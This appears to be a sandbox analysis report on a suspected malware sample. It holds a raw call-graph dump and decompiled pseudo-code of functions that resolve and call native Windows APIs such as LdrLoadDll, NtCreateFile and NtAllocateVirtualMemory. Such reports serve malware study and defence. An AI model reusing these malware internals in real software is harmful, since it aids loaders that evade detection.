2 API calls 34248 4188a0 34245->34248 34246->34245 34247 421233 2 API calls 34256 4188e8 34247->34256 34248->34247 34250 418a17 34366 421293 LdrLoadDll RtlFreeHeap 34250->34366 34252 418a21 34367 421293 LdrLoadDll RtlFreeHeap 34252->34367 34254 418a2b 34368 421293 LdrLoadDll RtlFreeHeap 34254->34368 34365 421293 LdrLoadDll RtlFreeHeap 34256->34365 34257 418a35 34369 421293 LdrLoadDll RtlFreeHeap 34257->34369 34259->34126 34261 419ab4 34260->34261 34262 419143 8 API calls 34261->34262 34266 419aca 34262->34266 34263 419ad3 34263->34130 34264 419b0a 34265 4200c3 2 API calls 34264->34265 34267 419b18 34265->34267 34266->34263 34266->34264 34268 419b53 34266->34268 34267->34130 34269 4200c3 2 API calls 34268->34269 34270 419b58 34269->34270 34270->34130 34272 41efa7 34271->34272 34273 41ee23 LdrLoadDll 34271->34273 34370 41ee23 34272->34370 34273->34272 34275 41efb0 34276 41ee23 LdrLoadDll 34275->34276 34277 41efb9 34276->34277 34278 41ee23 LdrLoadDll 34277->34278 34279 41efc2 34278->34279 34280 41ee23 LdrLoadDll 34279->34280 34281 41efcb 34280->34281 34282 41ee23 LdrLoadDll 34281->34282 34283 41efd4 34282->34283 34284 41ee23 LdrLoadDll 34283->34284 34285 41efe0 34284->34285 34286 41ee23 LdrLoadDll 34285->34286 34287 41efe9 34286->34287 34288 41ee23 LdrLoadDll 34287->34288 34289 41eff2 34288->34289 34290 41ee23 LdrLoadDll 34289->34290 34291 41effb 34290->34291 34292 41ee23 LdrLoadDll 34291->34292 34293 41f004 34292->34293 34294 41ee23 LdrLoadDll 34293->34294 34295 41f00d 34294->34295 34296 41ee23 LdrLoadDll 34295->34296 34297 41f019 34296->34297 34298 41ee23 LdrLoadDll 34297->34298 34299 41f022 34298->34299 34300 41ee23 LdrLoadDll 34299->34300 34301 41f02b 34300->34301 34302 41ee23 LdrLoadDll 34301->34302 34303 41f034 34302->34303 34304 41ee23 LdrLoadDll 34303->34304 34305 41f03d 34304->34305 34306 41ee23 LdrLoadDll 34305->34306 34307 41f046 34306->34307 34308 41ee23 LdrLoadDll 34307->34308 34309 41f052 34308->34309 34310 41ee23 LdrLoadDll 34309->34310 34311 41f05b 34310->34311 34312 41ee23 LdrLoadDll 34311->34312 34313 41f064 34312->34313 34314 41ee23 LdrLoadDll 34313->34314 34315 41f06d 34314->34315 34316 41ee23 LdrLoadDll 34315->34316 34317 41f076 34316->34317 34318 41ee23 LdrLoadDll 34317->34318 34319 41f07f 34318->34319 34320 41ee23 LdrLoadDll 34319->34320 34321 41f08b 34320->34321 34322 41ee23 LdrLoadDll 34321->34322 34323 41f094 34322->34323 34324 41ee23 LdrLoadDll 34323->34324 34325 41f09d 34324->34325 34326 41ee23 LdrLoadDll 34325->34326 34327 41f0a6 34326->34327 34328 41ee23 LdrLoadDll 34327->34328 34329 41f0af 34328->34329 34330 41ee23 LdrLoadDll 34329->34330 34331 41f0b8 34330->34331 34332 41ee23 LdrLoadDll 34331->34332 34333 41f0c4 34332->34333 34334 41ee23 LdrLoadDll 34333->34334 34335 41f0cd 34334->34335 34336 41ee23 LdrLoadDll 34335->34336 34337 41f0d6 34336->34337 34338 41ee23 LdrLoadDll 34337->34338 34339 41f0df 34338->34339 34340 41ee23 LdrLoadDll 34339->34340 34341 41f0e8 34340->34341 34342 41ee23 LdrLoadDll 34341->34342 34343 41f0f1 34342->34343 34344 41ee23 LdrLoadDll 34343->34344 34345 41f0fd 34344->34345 34346 41ee23 LdrLoadDll 34345->34346 34347 41f106 34346->34347 34348 41ee23 LdrLoadDll 34347->34348 34349 41f10f 34348->34349 34349->34134 34351 41f193 LdrLoadDll 34350->34351 34352 41e0af 34351->34352 34376 a39860 LdrInitializeThunk 34352->34376 34353 41e0c6 34353->34136 34355->34131 34357 41f193 LdrLoadDll 34356->34357 34358 41e72f NtAllocateVirtualMemory 34357->34358 34358->34234 34360 421243 34359->34360 34361 421249 34359->34361 34360->34239 34362 4201a3 2 API calls 34361->34362 34363 42126f 34362->34363 34363->34239 34364->34243 34365->34250 34366->34252 34367->34254 34368->34257 34369->34259 34371 41ee3e 34370->34371 34372 419553 LdrLoadDll 34371->34372 34374 41ee5e 34372->34374 34373 41ef12 34373->34275 34374->34373 34375 419553 LdrLoadDll 34374->34375 34375->34373 34376->34353 34378 a39681 34377->34378 34379 a3968f LdrInitializeThunk 34377->34379 34378->34140 34379->34140 34381 41f193 LdrLoadDll 34380->34381 34382 41e85f RtlFreeHeap 34381->34382 34382->34144 34384 409463 34383->34384 34385 40945e 34383->34385 34386 420043 2 API calls 34384->34386 34385->34072 34389 409488 34386->34389 34387 4094eb 34387->34072 34388 41e093 2 API calls 34388->34389 34389->34387 34389->34388 34391 4094f1 34389->34391 34394 420043 2 API calls 34389->34394 34399 41e793 34389->34399 34392 409517 34391->34392 34393 41e793 2 API calls 34391->34393 34392->34072 34395 409508 34393->34395 34394->34389 34395->34072 34397 41e793 2 API calls 34396->34397 34398 409731 34397->34398 34398->34031 34400 41e7af 34399->34400 34401 41f193 LdrLoadDll 34399->34401 34404 a396e0 LdrInitializeThunk 34400->34404 34401->34400 34402 41e7c6 34402->34389 34404->34402 34406 41f826 34405->34406 34409 40cf43 34406->34409 34408 40bde0 34408->34037 34411 40cf67 34409->34411 34410 40cf6e 34410->34408 34411->34410 34412 40cfa3 LdrLoadDll 34411->34412 34413 40cfba 34411->34413 34412->34413 34413->34408 34415 40d2b6 34414->34415 34417 40d333 34415->34417 34429 41de63 LdrLoadDll 34415->34429 34417->34044 34419 41f193 LdrLoadDll 34418->34419 34420 40fece 34419->34420 34420->34051 34421 41e9a3 34420->34421 34422 41f193 LdrLoadDll 34421->34422 34423 41e9c2 LookupPrivilegeValueW 34422->34423 34423->34048 34425 41e44f 34424->34425 34426 41f193 LdrLoadDll 34424->34426 34430 a39910 LdrInitializeThunk 34425->34430 34426->34425 34427 41e46e 34427->34052 34429->34417 34430->34427 34432 40d43a 34431->34432 34433 40d293 LdrLoadDll 34432->34433 34434 40d49d 34433->34434 34434->33990 34436 410073 34435->34436 34437 40ffbd 34435->34437 34436->33994 34436->33995 34438 40d293 LdrLoadDll 34437->34438 34439 40ffdf 34438->34439 34445 41e113 34439->34445 34441 410021 34448 41e153 34441->34448 34444 41e663 2 API calls 34444->34436 34446 41e12f 34445->34446 34447 41f193 LdrLoadDll 34445->34447 34446->34441 34447->34446 34449 41e16f 34448->34449 34450 41f193 LdrLoadDll 34448->34450 34453 a39fe0 LdrInitializeThunk 34449->34453 34450->34449 34451 410067 34451->34444 34453->34451 34455 40ddce 34454->34455 34456 40d413 LdrLoadDll 34455->34456 34457 40de25 34456->34457 34490 40d093 34457->34490 34459 40e09c 34459->34017 34460 40de4b 34460->34459 34499 418a83 34460->34499 34462 40de90 34462->34459 34502 40a083 34462->34502 34464 40ded4 34464->34459 34524 41e6d3 34464->34524 34468 40df2a 34469 40df31 34468->34469 34536 41e1e3 34468->34536 34471 4200c3 2 API calls 34469->34471 34473 40df3e 34471->34473 34473->34017 34474 40df7b 34475 4200c3 2 API calls 34474->34475 34476 40df82 34475->34476 34476->34017 34477 40df8b 34478 410163 3 API calls 34477->34478 34479 40dfff 34478->34479 34479->34469 34480 40e00a 34479->34480 34481 4200c3 2 API calls 34480->34481 34482 40e02e 34481->34482 34541 41e233 34482->34541 34485 41e1e3 2 API calls 34486 40e069 34485->34486 34486->34459 34546 41dff3 34486->34546 34489 41e883 2 API calls 34489->34459 34491 40d0a0 34490->34491 34492 40d0a4 34490->34492 34491->34460 34493 40d0bd 34492->34493 34494 40d0ef 34492->34494 34551 41dea3 LdrLoadDll 34493->34551 34552 41dea3 LdrLoadDll 34494->34552 34496 40d100 34496->34460 34498 40d0df 34498->34460 34500 410163 3 API calls 34499->34500 34501 418aa9 34500->34501 34501->34462 34553 40a2b3 34502->34553 34504 40a2a9 34504->34464 34505 40a0a1 34505->34504 34506 409453 4 API calls 34505->34506 34507 40a17f 34505->34507 34517 40a0df 34506->34517 34507->34504 34508 40a25f 34507->34508 34510 409453 4 API calls 34507->34510 34508->34504 34600 4103d3 10 API calls 34508->34600 34521 40a1bc 34510->34521 34511 40a273 34511->34504 34601 4103d3 10 API calls 34511->34601 34513 40a289 34513->34504 34602 4103d3 10 API calls 34513->34602 34515 40a29f 34515->34464 34517->34507 34518 40a175 34517->34518 34567 409d63 34517->34567 34519 409713 2 API calls 34518->34519 34519->34507 34520 409d63 14 API calls 34520->34521 34521->34508 34521->34520 34522 40a255 34521->34522 34523 409713 2 API calls 34522->34523 34523->34508 34525 41f193 LdrLoadDll 34524->34525 34526 41e6ef 34525->34526 34684 a398f0 LdrInitializeThunk 34526->34684 34527 40df0b 34529 410163 34527->34529 34530 410180 34529->34530 34685 41e193 34530->34685 34533 4101c8 34533->34468 34534 41e1e3 2 API calls 34535 4101f1 34534->34535 34535->34468 34537 41e1ff 34536->34537 34538 41f193 LdrLoadDll 34536->34538 34692 a39780 LdrInitializeThunk 34537->34692 34538->34537 34539 40df6e 34539->34474 34539->34477 34542 41f193 LdrLoadDll 34541->34542 34543 41e24f 34542->34543 34693 a397a0 LdrInitializeThunk 34543->34693 34544 40e042 34544->34485 34547 41f193 LdrLoadDll 34546->34547 34548 41e00f 34547->34548 34694 a39a20 LdrInitializeThunk 34548->34694 34549 40e095 34549->34489 34551->34498 34552->34496 34555 40a2da 34553->34555 34554 40a53f 34554->34505 34555->34554 34556 409453 4 API calls 34555->34556 34557 40a32d 34556->34557 34557->34554 34558 409713 2 API calls 34557->34558 34559 40a3bc 34558->34559 34559->34554 34560 409453 4 API calls 34559->34560 34561 40a3d1 34560->34561 34561->34554 34562 409713 2 API calls 34561->34562 34565 40a431 34562->34565 34563 409453 4 API calls 34563->34565 34564 409d63 14 API calls 34564->34565 34565->34554 34565->34563 34565->34564 34566 409713 2 API calls 34565->34566 34566->34565 34568 409d88 34567->34568 34603 41dee3 34568->34603 34571 409ddc 34571->34517 34572 409e5d 34636 4102b3 LdrLoadDll NtClose 34572->34636 34573 41e0d3 2 API calls 34574 409e00 34573->34574 34574->34572 34576 409e0b 34574->34576 34578 409e89 34576->34578 34606 40e0b3 34576->34606 34577 409e78 34579 409e95 34577->34579 34580 409e7f 34577->34580 34578->34517 34637 41df63 LdrLoadDll 34579->34637 34582 41e663 2 API calls 34580->34582 34582->34578 34583 409e25 34583->34578 34626 409b93 34583->34626 34585 409ec0 34587 40e0b3 5 API calls 34585->34587 34589 409ee0 34587->34589 34589->34578 34638 41df93 LdrLoadDll 34589->34638 34591 409f05 34639 41e023 LdrLoadDll 34591->34639 34593 409f1f 34594 41dff3 2 API calls 34593->34594 34595 409f2e 34594->34595 34596 41e663 2 API calls 34595->34596 34597 409f38 34596->34597 34640 409963 34597->34640 34599 409f4c 34599->34517 34600->34511 34601->34513 34602->34515 34604 41f193 LdrLoadDll 34603->34604 34605 409dd2 34604->34605 34605->34571 34605->34572 34605->34573 34607 40e0e1 34606->34607 34608 410163 3 API calls 34607->34608 34609 40e143 34608->34609 34610 40e18c 34609->34610 34611 41e1e3 2 API calls 34609->34611 34610->34583 34612 40e16e 34611->34612 34613 40e178 34612->34613 34617 40e198 34612->34617 34614 41e233 2 API calls 34613->34614 34615 40e182 34614->34615 34616 41e663 2 API calls 34615->34616 34616->34610 34618 40e222 34617->34618 34619 40e205 34617->34619 34620 41e233 2 API calls 34618->34620 34621 41e663 2 API calls 34619->34621 34622 40e231 34620->34622 34623 40e20f 34621->34623 34624 41e663 2 API calls 34622->34624 34623->34583 34625 40e23b 34624->34625 34625->34583 34628 409ba5 34626->34628 34627 409d34 34627->34517 34628->34627 34656 409753 34628->34656 34630 409ca8 34630->34627 34631 409963 11 API calls 34630->34631 34632 409cd6 34631->34632 34632->34627 34633 41e0d3 2 API calls 34632->34633 34634 409d0b 34633->34634 34634->34627 34635 41e6d3 2 API calls 34634->34635 34635->34627 34636->34577 34637->34585 34638->34591 34639->34593 34641 40998c 34640->34641 34663 4098c3 34641->34663 34644 41e6d3 2 API calls 34645 40999f 34644->34645 34645->34644 34646 409a2a 34645->34646 34648 409a25 34645->34648 34671 410333 34645->34671 34646->34599 34647 41e663 2 API calls 34649 409a5d 34647->34649 34648->34647 34649->34646 34650 41dee3 LdrLoadDll 34649->34650 34651 409ac2 34650->34651 34651->34646 34675 41df23 34651->34675 34653 409b26 34653->34646 34654 419143 8 API calls 34653->34654 34655 409b7b 34654->34655 34655->34599 34657 409852 34656->34657 34658 409768 34656->34658 34657->34630 34658->34657 34659 419143 8 API calls 34658->34659 34661 4097d5 34659->34661 34660 4097fc 34660->34630 34661->34660 34662 4200c3 2 API calls 34661->34662 34662->34660 34664 4098dd 34663->34664 34665 40cf43 LdrLoadDll 34664->34665 34666 4098f8 34665->34666 34667 419553 LdrLoadDll 34666->34667 34668 409910 34667->34668 34669 40992c 34668->34669 34670 409919 PostThreadMessageW 34668->34670 34669->34645 34670->34669 34672 410346 34671->34672 34678 41e063 34672->34678 34676 41f193 LdrLoadDll 34675->34676 34677 41df3f 34676->34677 34677->34653 34679 41f193 LdrLoadDll 34678->34679 34680 41e07f 34679->34680 34683 a39840 LdrInitializeThunk 34680->34683 34681 410371 34681->34645 34683->34681 34684->34527 34686 41e1a9 34685->34686 34687 41f193 LdrLoadDll 34686->34687 34688 41e1af 34687->34688 34691 a399a0 LdrInitializeThunk 34688->34691 34689 4101c1 34689->34533 34689->34534 34691->34689 34692->34539 34693->34544 34694->34549 34695 40b503 34696 40b528 34695->34696 34697 40cf43 LdrLoadDll 34696->34697 34698 40b55b 34697->34698 34699 40b580 34698->34699 34701 40eaf3 34698->34701 34702 40eb1f 34701->34702 34703 41e3b3 LdrLoadDll 34702->34703 34704 40eb38 34703->34704 34705 40eb3f 34704->34705 34712 41e3f3 34704->34712 34705->34699 34709 40eb7a 34710 41e663 2 API calls 34709->34710 34711 40eb9d 34710->34711 34711->34699 34713 41e40f 34712->34713 34714 41f193 LdrLoadDll 34712->34714 34718 a39710 LdrInitializeThunk 34713->34718 34714->34713 34715 40eb62 34715->34705 34717 41e9e3 LdrLoadDll 34715->34717 34717->34709 34718->34715 34721 a39540 LdrInitializeThunk 34723 42135c 34724 4212fd 34723->34724 34727 421363 34723->34727 34725 42130d 34724->34725 34726 4201a3 2 API calls 34724->34726 34724->34727 34728 4200c3 2 API calls 34725->34728 34726->34725 34729 421330 34728->34729

                                                            Executed Functions

                                                            Function 0040CF43 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 143 40cf43-40cf6c call 420e53 146 40cf72-40cf80 call 421373 143->146 147 40cf6e-40cf71 143->147 150 40cf90-40cfa1 call 41f703 146->150 151 40cf82-40cf8d call 4215f3 146->151 156 40cfa3-40cfb7 LdrLoadDll 150->156 157 40cfba-40cfbd 150->157 151->150 156->157
                                                            C-Code - Quality: 100%
                                                            			E0040CF43(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420E53( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00421373(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E004215F3( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F703(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                            0x0040cf5f
                                                            0x0040cf62
                                                            0x0040cf67
                                                            0x0040cf6c
                                                            0x0040cf76
                                                            0x0040cf7b
                                                            0x0040cf7e
                                                            0x0040cf80
                                                            0x0040cf88
                                                            0x0040cf8d
                                                            0x0040cf8d
                                                            0x0040cf94
                                                            0x0040cf9c
                                                            0x0040cf9f
                                                            0x0040cfa1
                                                            0x0040cfb5
                                                            0x00000000
                                                            0x0040cfb7
                                                            0x0040cfbd
                                                            0x0040cf71
                                                            0x0040cf71
                                                            0x0040cf71

                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CFB5
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 8489fcc92341f42d66faac6a62ee3c93024a01d1882fc47015a7f916a59bd378
                                                            • Instruction ID: eef9a5b2757d79ac7c5e2f6930eefc3df15ab87ea646a953be5e35fc412cbedf
                                                            • Opcode Fuzzy Hash: 8489fcc92341f42d66faac6a62ee3c93024a01d1882fc47015a7f916a59bd378
                                                            • Instruction Fuzzy Hash: 7C0152B1E4010EBBDF10DBE1DC82F9EB3789B54308F0042A6E908A7280F634EB448795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E52E Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 158 41e52e-41e584 call 41f193 NtCreateFile
                                                            C-Code - Quality: 79%
                                                            			E0041E52E(HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
				intOrPtr _v0;
				long _t21;

				asm("fbld tword [edx-0x74aa83de]");
				_t15 = _v0;
				_t3 = _t15 + 0xa6c; // 0xa6c
				E0041F193( *((intOrPtr*)(_v0 + 0x14)), _t15, _t3,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
				return _t21;
			}





                                                            0x0041e52f
                                                            0x0041e536
                                                            0x0041e542
                                                            0x0041e54a
                                                            0x0041e580
                                                            0x0041e584

                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,?,004192AF,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,004192AF,?,00000000,00000060,00000000,00000000), ref: 0041E580
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: e649ee6bc546698869febb0294371ff98a37010275feddef859584c4e7f0806b
                                                            • Instruction ID: 156706fe607d690ab6be54b4b2e7a4e23d1c2cf90179f7226c928974bd938377
                                                            • Opcode Fuzzy Hash: e649ee6bc546698869febb0294371ff98a37010275feddef859584c4e7f0806b
                                                            • Instruction Fuzzy Hash: 9E01CFB2200108BFCB08CF98DC85EEB77AEAF8C354F058659BA0DD7245C630E851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E533 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 161 41e533-41e549 162 41e54f-41e584 NtCreateFile 161->162 163 41e54a call 41f193 161->163 163->162
                                                            C-Code - Quality: 100%
                                                            			E0041E533(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F193( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                            0x0041e542
                                                            0x0041e54a
                                                            0x0041e580
                                                            0x0041e584

                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,?,004192AF,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,004192AF,?,00000000,00000060,00000000,00000000), ref: 0041E580
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: f9e00ad4482a0849a297f43a55053ea859885cbadaec293609717f189d3e0e37
                                                            • Instruction ID: 2b1b68b6ace5d83723ffac424aef60341f3aee9ed0c6c8572fed624b1aa90786
                                                            • Opcode Fuzzy Hash: f9e00ad4482a0849a297f43a55053ea859885cbadaec293609717f189d3e0e37
                                                            • Instruction Fuzzy Hash: 69F06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158258BA0997241D630E8518BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E5DD Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 164 41e5dd-41e62c call 41f193 NtReadFile
                                                            C-Code - Quality: 37%
                                                            			E0041E5DD(void* __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t29;
				signed int _t31;
				signed int _t32;

				_t32 = _t31 | 0x8b55fbac;
				_t13 = _a4;
				_t3 = _t13 + 0xa74; // 0xa76
				_t29 = _t3;
				E0041F193( *((intOrPtr*)(_a4 + 0x14)), _t13, _t29,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t29))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, __esi, _t32); // executed
				return _t18;
			}







                                                            0x0041e5df
                                                            0x0041e5e6
                                                            0x0041e5f2
                                                            0x0041e5f2
                                                            0x0041e5fa
                                                            0x0041e628
                                                            0x0041e62c

                                                            APIs
                                                            • NtReadFile.NTDLL(00419473,00414943,FFFFFFFF,00418F6D,00000002,?,00419473,00000002,00418F6D,FFFFFFFF,00414943,00419473,00000002,00000000), ref: 0041E628
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: ed9694a341561753e05285050faa4932f5bf3abbb446f9e147fe4a392cff66db
                                                            • Instruction ID: 953d8ee4d0a84539e4fc25736fa2f222501fd37172b16a1631702880f19584fb
                                                            • Opcode Fuzzy Hash: ed9694a341561753e05285050faa4932f5bf3abbb446f9e147fe4a392cff66db
                                                            • Instruction Fuzzy Hash: F6F0F4B6204108AFCB04DF99DC84EEB37AAAF8C754F118219BA4DD7640D630E8118BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E5E3 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 167 41e5e3-41e5f9 168 41e5ff-41e62c NtReadFile 167->168 169 41e5fa call 41f193 167->169 169->168
                                                            C-Code - Quality: 37%
                                                            			E0041E5E3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F193( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                            0x0041e5f2
                                                            0x0041e5f2
                                                            0x0041e5fa
                                                            0x0041e628
                                                            0x0041e62c

                                                            APIs
                                                            • NtReadFile.NTDLL(00419473,00414943,FFFFFFFF,00418F6D,00000002,?,00419473,00000002,00418F6D,FFFFFFFF,00414943,00419473,00000002,00000000), ref: 0041E628
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 4a8275df831c3d103a1ee09491f1c56fc34e4d4c9c2c3dd0733fd8e64b380651
                                                            • Instruction ID: 8267991fd254506ff5c12054cf4ce0d2ef14d088a061f9b48d3366a1a6515465
                                                            • Opcode Fuzzy Hash: 4a8275df831c3d103a1ee09491f1c56fc34e4d4c9c2c3dd0733fd8e64b380651
                                                            • Instruction Fuzzy Hash: D0F0AFB2204208ABCB14DF99DC85EEB77ADAF8C754F118659BA0DA7241D630E8118BA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E713 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 170 41e713-41e750 call 41f193 NtAllocateVirtualMemory
                                                            C-Code - Quality: 100%
                                                            			E0041E713(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t10 = _a4;
				_t2 = _t10 + 0x14; // 0x6ad04d03
				_t3 = _t10 + 0xa8c; // 0x404043
				E0041F193( *_t2, _a4, _t3,  *_t2, 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                            0x0041e716
                                                            0x0041e719
                                                            0x0041e722
                                                            0x0041e72a
                                                            0x0041e74c
                                                            0x0041e750

                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035B7,00000004,00001000,00000000), ref: 0041E74C
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: 1a2afb1199764b3ee1871c756a078253b48bd289b14f1863eddbd5e4938c396b
                                                            • Instruction ID: e6812e2bdcb128a110ff40e1d504f12d9a01502f7c3e321230f9032499d83fe4
                                                            • Opcode Fuzzy Hash: 1a2afb1199764b3ee1871c756a078253b48bd289b14f1863eddbd5e4938c396b
                                                            • Instruction Fuzzy Hash: D5F01EB2200208ABCB18DF89DC81EEB77ADAF88754F018119BE0897241C630F811CBF4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E663 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0041E663(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F193( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                            0x0041e67a
                                                            0x0041e688
                                                            0x0041e68c

                                                            APIs
                                                            • NtClose.NTDLL(00410318,00000000,?,00410318,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E688
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_zkvixbqxp.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 483295ff726938af70535adf8b8cac973edaec2d38b825176723024c9b71d713
                                                            • Instruction ID: 02376b6f76cb9e47f23ed12eca07df7f6f29c9363c61c2694102c291e86304b3
                                                            • Opcode Fuzzy Hash: 483295ff726938af70535adf8b8cac973edaec2d38b825176723024c9b71d713
